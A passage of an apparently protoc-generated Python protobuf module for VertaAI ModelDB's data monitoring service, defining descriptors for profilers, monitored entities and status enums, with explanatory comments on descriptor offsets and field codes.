\x01(\x0e\x32\x32.ai.verta.monitoring.DeployStatusEnum.DeployStatus\"\x8d\x01\n\x18GetProfilerStatusRequest\x12\x13\n\x0bprofiler_id\x18\x01 \x01(\r\x12\x1b\n\x13monitored_entity_id\x18\x02 \x01(\r\x1a?\n\x08Response\x12\x33\n\x06status\x18\x01 \x01(\x0b\x32#.ai.verta.monitoring.ProfilerStatus\"\x88\x01\n&FindProfilersForMonitoredEntityRequest\x12\x1b\n\x13monitored_entity_id\x18\x01 \x01(\r\x1a\x41\n\x08Response\x12\x35\n\x08statuses\x18\x01 \x03(\x0b\x32#.ai.verta.monitoring.ProfilerStatus\"\x80\x01\n\x08KeyValue\x12\x0b\n\x03key\x18\x01 \x01(\t\x12%\n\x05value\x18\x02 \x01(\x0b\x32\x16.google.protobuf.Value\x12@\n\nvalue_type\x18\x03 \x01(\x0e\x32,.ai.verta.monitoring.ValueTypeEnum.ValueType\"H\n\rValueTypeEnum\"7\n\tValueType\x12\n\n\x06STRING\x10\x00\x12\n\n\x06NUMBER\x10\x01\x12\x08\n\x04LIST\x10\x02\x12\x08\n\x04\x42LOB\x10\x03\"\xbe\x01\n\x15\x45nableProfilerRequest\x12\x13\n\x0bprofiler_id\x18\x01 \x01(\r\x12\x1b\n\x13monitored_entity_id\x18\x02 \x01(\r\x12\x32\n\x0b\x65nvironment\x18\x03 \x03(\x0b\x32\x1d.ai.verta.monitoring.KeyValue\x1a?\n\x08Response\x12\x33\n\x06status\x18\x01 \x01(\x0b\x32#.ai.verta.monitoring.ProfilerStatus\"\x8b\x01\n\x16\x44isableProfilerRequest\x12\x13\n\x0bprofiler_id\x18\x01 \x01(\r\x12\x1b\n\x13monitored_entity_id\x18\x02 \x01(\r\x1a?\n\x08Response\x12\x33\n\x06status\x18\x01 \x01(\x0b\x32#.ai.verta.monitoring.ProfilerStatus\"\xbc\x03\n\x0fMonitoredEntity\x12\n\n\x02id\x18\x01 \x01(\x04\x12\x0c\n\x04name\x18\x02 \x01(\t\x12\x14\n\x0cworkspace_id\x18\x05 \x01(\x04\x12#\n\x1b\x63reated_at_timestamp_millis\x18\x06 \x01(\x04\x12#\n\x1bupdated_at_timestamp_millis\x18\x07 \x01(\x04\x12H\n\nattributes\x18\x08 \x03(\x0b\x32\x34.ai.verta.monitoring.MonitoredEntity.AttributesEntry\x12\r\n\x05owner\x18\t \x01(\t\x12=\n\x13resource_visibility\x18\n \x01(\x0e\x32 .ai.verta.uac.ResourceVisibility\x12@\n\x11\x63ustom_permission\x18\x0b \x01(\x0b\x32%.ai.verta.uac.CollaboratorPermissions\x12\x16\n\x0eversion_number\x18\x0c \x01(\x04\x1a\x31\n\x0f\x41ttributesEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01J\x04\x08\x03\x10\x04J\x04\x08\x04\x10\x05\"\xd9\x03\n\x1c\x43reateMonitoredEntityRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x16\n\x0cworkspace_id\x18\x04 \x01(\x04H\x00\x12\x18\n\x0eworkspace_name\x18\x05 \x01(\tH\x00\x12U\n\nattributes\x18\x06 \x03(\x0b\x32\x41.ai.verta.monitoring.CreateMonitoredEntityRequest.AttributesEntry\x12=\n\x13resource_visibility\x18\x07 \x01(\x0e\x32 .ai.verta.uac.ResourceVisibility\x12@\n\x11\x63ustom_permission\x18\x08 \x01(\x0b\x32%.ai.verta.uac.CollaboratorPermissions\x1a\x31\n\x0f\x41ttributesEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\x1aJ\n\x08Response\x12>\n\x10monitored_entity\x18\x01 \x01(\x0b\x32$.ai.verta.monitoring.MonitoredEntityB\x16\n\x14workspace_identifierJ\x04\x08\x02\x10\x03J\x04\x08\x03\x10\x04\"\x95\x03\n\x1cUpdateMonitoredEntityRequest\x12\n\n\x02id\x18\x01 \x01(\x04\x12\x0c\n\x04name\x18\x02 \x01(\t\x12U\n\nattributes\x18\x07 \x03(\x0b\x32\x41.ai.verta.monitoring.UpdateMonitoredEntityRequest.AttributesEntry\x12=\n\x13resource_visibility\x18\x08 \x01(\x0e\x32 .ai.verta.uac.ResourceVisibility\x12@\n\x11\x63ustom_permission\x18\t \x01(\x0b\x32%.ai.verta.uac.CollaboratorPermissions\x1a\x31\n\x0f\x41ttributesEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\x1aJ\n\x08Response\x12>\n\x10monitored_entity\x18\x01 \x01(\x0b\x32$.ai.verta.monitoring.MonitoredEntityJ\x04\x08\x04\x10\x07\"\xa5\x02\n\x1a\x46indMonitoredEntityRequest\x12\x0b\n\x03ids\x18\x01 \x03(\x04\x12\r\n\x05names\x18\x02 \x03(\t\x12\x13\n\x0b\x66uzzy_names\x18\x07 \x03(\t\x12\x16\n\x0cworkspace_id\x18\x03 \x01(\x04H\x00\x12\x18\n\x0eworkspace_name\x18\x06 \x01(\tH\x00\x12\x13\n\x0bpage_number\x18\x04 \x01(\x05\x12\x12\n\npage_limit\x18\x05 \x01(\x05\x1a\x63\n\x08Response\x12@\n\x12monitored_entities\x18\x01 \x03(\x0b\x32$.ai.verta.monitoring.MonitoredEntity\x12\x15\n\rtotal_records\x18\x02 \x01(\x05\x42\x16\n\x14workspace_identifier\"6\n\x1c\x44\x65leteMonitoredEntityRequest\x12\n\n\x02id\x18\x01 \x01(\x04\x1a\n\n\x08Response2\xd0\x13\n\x15\x44\x61taMonitoringService\x12\xcc\x01\n\x15\x63reateMonitoredEntity\x12\x31.ai.verta.monitoring.CreateMonitoredEntityRequest\x1a:.ai.verta.monitoring.CreateMonitoredEntityRequest.Response\"D\x82\xd3\xe4\x93\x02>\"9/api/v1/monitoring/monitored_entity/createMonitoredEntity:\x01*\x12\xcc\x01\n\x15updateMonitoredEntity\x12\x31.ai.verta.monitoring.UpdateMonitoredEntityRequest\x1a:.ai.verta.monitoring.UpdateMonitoredEntityRequest.Response\"D\x82\xd3\xe4\x93\x02>29/api/v1/monitoring/monitored_entity/updateMonitoredEntity:\x01*\x12\xc4\x01\n\x13\x66indMonitoredEntity\x12/.ai.verta.monitoring.FindMonitoredEntityRequest\x1a\x38.ai.verta.monitoring.FindMonitoredEntityRequest.Response\"B\x82\xd3\xe4\x93\x02<\"7/api/v1/monitoring/monitored_entity/findMonitoredEntity:\x01*\x12\xcc\x01\n\x15\x64\x65leteMonitoredEntity\x12\x31.ai.verta.monitoring.DeleteMonitoredEntityRequest\x1a:.ai.verta.monitoring.DeleteMonitoredEntityRequest.Response\"D\x82\xd3\xe4\x93\x02>*9/api/v1/monitoring/monitored_entity/deleteMonitoredEntity:\x01*\x12\xa1\x01\n\x0bgetProfiler\x12\'.ai.verta.monitoring.GetProfilerRequest\x1a\x30.ai.verta.monitoring.GetProfilerRequest.Response\"7\x82\xd3\xe4\x93\x02\x31\x12//api/v1/monitoring/monitored_entity/getProfiler\x12\xb0\x01\n\x0e\x63reateProfiler\x12*.ai.verta.monitoring.CreateProfilerRequest\x1a\x33.ai.verta.monitoring.CreateProfilerRequest.Response\"=\x82\xd3\xe4\x93\x02\x37\"2/api/v1/monitoring/monitored_entity/createProfiler:\x01*\x12\xb0\x01\n\x0eupdateProfiler\x12*.ai.verta.monitoring.UpdateProfilerRequest\x1a\x33.ai.verta.monitoring.UpdateProfilerRequest.Response\"=\x82\xd3\xe4\x93\x02\x37\x32\x32/api/v1/monitoring/monitored_entity/updateProfiler:\x01*\x12\xa9\x01\n\rlistProfilers\x12).ai.verta.monitoring.ListProfilersRequest\x1a\x32.ai.verta.monitoring.ListProfilersRequest.Response\"9\x82\xd3\xe4\x93\x02\x33\x12\x31/api/v1/monitoring/monitored_entity/listProfilers\x12\xaf\x01\n\x0e\x64\x65leteProfiler\x12*.ai.verta.monitoring.DeleteProfilerRequest\x1a\x33.ai.verta.monitoring.DeleteProfilerRequest.Response\"<\x82\xd3\xe4\x93\x02\x36*1/api/v1/monitoring/monitored_entity/deleteProfile:\x01*\x12\xb9\x01\n\x11getProfilerStatus\x12-.ai.verta.monitoring.GetProfilerStatusRequest\x1a\x36.ai.verta.monitoring.GetProfilerStatusRequest.Response\"=\x82\xd3\xe4\x93\x02\x37\x12\x35/api/v1/monitoring/monitored_entity/getProfilerStatus\x12\xf4\x01\n\x1f\x66indProfilersForMonitoredEntity\x12;.ai.verta.monitoring.FindProfilersForMonitoredEntityRequest\x1a\x44.ai.verta.monitoring.FindProfilersForMonitoredEntityRequest.Response\"N\x82\xd3\xe4\x93\x02H\"C/api/v1/monitoring/monitored_entity/findProfilersForMonitoredEntity:\x01*\x12\xb0\x01\n\x0e\x65nableProfiler\x12*.ai.verta.monitoring.EnableProfilerRequest\x1a\x33.ai.verta.monitoring.EnableProfilerRequest.Response\"=\x82\xd3\xe4\x93\x02\x37\"2/api/v1/monitoring/monitored_entity/enableProfiler:\x01*\x12\xb4\x01\n\x0f\x64isableProfiler\x12+.ai.verta.monitoring.DisableProfilerRequest\x1a\x34.ai.verta.monitoring.DisableProfilerRequest.Response\">\x82\xd3\xe4\x93\x02\x38\"3/api/v1/monitoring/monitored_entity/disableProfiler:\x01*BEP\x01ZAgithub.com/VertaAI/modeldb/protos/gen/go/protos/public/monitoringb\x06proto3'
,
dependencies=[uac_dot_Collaborator__pb2.DESCRIPTOR,google_dot_api_dot_annotations__pb2.DESCRIPTOR,google_dot_protobuf_dot_struct__pb2.DESCRIPTOR,])
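# Editorial note (not part of protoc's output): serialized_pb above is the
# compiled FileDescriptorProto for DataMonitoringService.proto, stored as raw
# bytes. The descriptor objects defined below do not restate the schema; they
# index into these bytes via their serialized_start/serialized_end offsets.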
_BUILDSTATUSENUM_BUILDSTATUS = _descriptor.EnumDescriptor(
name='BuildStatus',
full_name='ai.verta.monitoring.BuildStatusEnum.BuildStatus',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNDEFINED', index=0, number=0,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BUILDING', index=1, number=1,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DELETING', index=2, number=2,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ERROR', index=3, number=3,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FINISHED', index=4, number=4,
serialized_options=None,
type=None),
],
containing_type=None,
serialized_options=None,
serialized_start=731,
serialized_end=812,
)
_sym_db.RegisterEnumDescriptor(_BUILDSTATUSENUM_BUILDSTATUS)
_DEPLOYSTATUSENUM_DEPLOYSTATUS = _descriptor.EnumDescriptor(
name='DeployStatus',
full_name='ai.verta.monitoring.DeployStatusEnum.DeployStatus',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNDEFINED', index=0, number=0,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INACTIVE', index=1, number=1,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ACTIVE', index=2, number=2,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='UPDATING', index=3, number=3,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CREATING', index=4, number=4,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ERROR', index=5, number=5,
serialized_options=None,
type=None),
],
containing_type=None,
serialized_options=None,
serialized_start=834,
serialized_end=928,
)
_sym_db.RegisterEnumDescriptor(_DEPLOYSTATUSENUM_DEPLOYSTATUS)
_VALUETYPEENUM_VALUETYPE = _descriptor.EnumDescriptor(
name='ValueType',
full_name='ai.verta.monitoring.ValueTypeEnum.ValueType',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='STRING', index=0, number=0,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NUMBER', index=1, number=1,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LIST', index=2, number=2,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BLOB', index=3, number=3,
serialized_options=None,
type=None),
],
containing_type=None,
serialized_options=None,
serialized_start=1577,
serialized_end=1632,
)
_sym_db.RegisterEnumDescriptor(_VALUETYPEENUM_VALUETYPE)
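# Usage sketch (standard descriptor API from the protobuf runtime; shown for
# orientation only): a registered EnumDescriptor resolves values by name or
# number, e.g.
#   _BUILDSTATUSENUM_BUILDSTATUS.values_by_name['FINISHED'].number   # -> 4
#   _DEPLOYSTATUSENUM_DEPLOYSTATUS.values_by_number[2].name          # -> 'ACTIVE'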
_PROFILER = _descriptor.Descriptor(
name='Profiler',
full_name='ai.verta.monitoring.Profiler',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='ai.verta.monitoring.Profiler.id', index=0,
number=1, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='name', full_name='ai.verta.monitoring.Profiler.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='profiler_reference', full_name='ai.verta.monitoring.Profiler.profiler_reference', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=147,
serialized_end=211,
)
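# Editorial note: the numeric codes in the FieldDescriptor entries follow the
# constants on google.protobuf.descriptor.FieldDescriptor, e.g. type=4 is
# TYPE_UINT64, type=9 TYPE_STRING, type=11 TYPE_MESSAGE; label=1 is
# LABEL_OPTIONAL and label=3 LABEL_REPEATED.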
_CREATEPROFILERREQUEST_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='ai.verta.monitoring.CreateProfilerRequest.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='profiler', full_name='ai.verta.monitoring.CreateProfilerRequest.Response.profiler', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=280,
serialized_end=339,
)
_CREATEPROFILERREQUEST = _descriptor.Descriptor(
name='CreateProfilerRequest',
full_name='ai.verta.monitoring.CreateProfilerRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='ai.verta.monitoring.CreateProfilerRequest.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='profiler_reference', full_name='ai.verta.monitoring.CreateProfilerRequest.profiler_reference', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_CREATEPROFILERREQUEST_RESPONSE, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=213,
serialized_end=339,
)
_GETPROFILERREQUEST_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='ai.verta.monitoring.GetProfilerRequest.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='profiler', full_name='ai.verta.monitoring.GetProfilerRequest.Response.profiler', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=280,
serialized_end=339,
)
_GETPROFILERREQUEST = _descriptor.Descriptor(
name='GetProfilerRequest',
full_name='ai.verta.monitoring.GetProfilerRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='ai.verta.monitoring.GetProfilerRequest.id', index=0,
number=1, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_GETPROFILERREQUEST_RESPONSE, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=341,
serialized_end=434,
)
_UPDATEPROFILERREQUEST_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='ai.verta.monitoring.UpdateProfilerRequest.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='profiler', full_name='ai.verta.monitoring.UpdateProfilerRequest.Response.profiler', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=280,
serialized_end=339,
)
_UPDATEPROFILERREQUEST = _descriptor.Descriptor(
name='UpdateProfilerRequest',
full_name='ai.verta.monitoring.UpdateProfilerRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='ai.verta.monitoring.UpdateProfilerRequest.id', index=0,
number=1, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='name', full_name='ai.verta.monitoring.UpdateProfilerRequest.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='profiler_reference', full_name='ai.verta.monitoring.UpdateProfilerRequest.profiler_reference', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_UPDATEPROFILERREQUEST_RESPONSE, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=437,
serialized_end=575,
)
_LISTPROFILERSREQUEST_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='ai.verta.monitoring.ListProfilersRequest.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='profilers', full_name='ai.verta.monitoring.ListProfilersRequest.Response.profilers', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=601,
serialized_end=661,
)
_LISTPROFILERSREQUEST = _descriptor.Descriptor(
name='ListProfilersRequest',
full_name='ai.verta.monitoring.ListProfilersRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[_LISTPROFILERSREQUEST_RESPONSE, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=577,
serialized_end=661,
)
_DELETEPROFILERREQUEST_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='ai.verta.monitoring.DeleteProfilerRequest.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=280,
serialized_end=290,
)
_DELETEPROFILERREQUEST = _descriptor.Descriptor(
name='DeleteProfilerRequest',
full_name='ai.verta.monitoring.DeleteProfilerRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='ai.verta.monitoring.DeleteProfilerRequest.id', index=0,
number=1, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_DELETEPROFILERREQUEST_RESPONSE, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=663,
serialized_end=710,
)
_BUILDSTATUSENUM = _descriptor.Descriptor(
name='BuildStatusEnum',
full_name='ai.verta.monitoring.BuildStatusEnum',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_BUILDSTATUSENUM_BUILDSTATUS,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=712,
serialized_end=812,
)
_DEPLOYSTATUSENUM = _descriptor.Descriptor(
name='DeployStatusEnum',
full_name='ai.verta.monitoring.DeployStatusEnum',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_DEPLOYSTATUSENUM_DEPLOYSTATUS,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=814,
serialized_end=928,
)
_PROFILERSTATUS = _descriptor.Descriptor(
name='ProfilerStatus',
full_name='ai.verta.monitoring.ProfilerStatus',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='profiler_id', full_name='ai.verta.monitoring.ProfilerStatus.profiler_id', index=0,
number=1, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='monitored_entity_id', full_name='ai.verta.monitoring.ProfilerStatus.monitored_entity_id', index=1,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='build_status', full_name='ai.verta.monitoring.ProfilerStatus.build_status', index=2,
number=3, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='deploy_status', full_name='ai.verta.monitoring.ProfilerStatus.deploy_status', index=3,
number=4, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=931,
serialized_end=1144,
)
_GETPROFILERSTATUSREQUEST_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='ai.verta.monitoring.GetProfilerStatusRequest.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='status', full_name='ai.verta.monitoring.GetProfilerStatusRequest.Response.status', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1225,
serialized_end=1288,
)
_GETPROFILERSTATUSREQUEST = _descriptor.Descriptor(
name='GetProfilerStatusRequest',
full_name='ai.verta.monitoring.GetProfilerStatusRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='profiler_id', full_name='ai.verta.monitoring.GetProfilerStatusRequest.profiler_id', index=0,
number=1, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='monitored_entity_id', full_name='ai.verta.monitoring.GetProfilerStatusRequest.monitored_entity_id', index=1,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_GETPROFILERSTATUSREQUEST_RESPONSE, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1147,
serialized_end=1288,
)
_FINDPROFILERSFORMONITOREDENTITYREQUEST_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='ai.verta.monitoring.FindProfilersForMonitoredEntityRequest.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='statuses', full_name='ai.verta.monitoring.FindProfilersForMonitoredEntityRequest.Response.statuses', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1362,
serialized_end=1427,
)
_FINDPROFILERSFORMONITOREDENTITYREQUEST = _descriptor.Descriptor(
name='FindProfilersForMonitoredEntityRequest',
full_name='ai.verta.monitoring.FindProfilersForMonitoredEntityRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='monitored_entity_id', full_name='ai.verta.monitoring.FindProfilersForMonitoredEntityRequest.monitored_entity_id', index=0,
number=1, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_FINDPROFILERSFORMONITOREDENTITYREQUEST_RESPONSE, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1291,
serialized_end=1427,
)
_KEYVALUE = _descriptor.Descriptor(
name='KeyValue',
full_name='ai.verta.monitoring.KeyValue',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='ai.verta.monitoring.KeyValue.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='value', full_name='ai.verta.monitoring.KeyValue.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='value_type', full_name='ai.verta.monitoring.KeyValue.value_type', index=2,
number=3, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1430,
serialized_end=1558,
)
_VALUETYPEENUM = _descriptor.Descriptor(
name='ValueTypeEnum',
full_name='ai.verta.monitoring.ValueTypeEnum',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_VALUETYPEENUM_VALUETYPE,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1560,
serialized_end=1632,
)
_ENABLEPROFILERREQUEST_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='ai.verta.monitoring.EnableProfilerRequest.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='status', full_name='ai.verta.monitoring.EnableProfilerRequest.Response.status', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
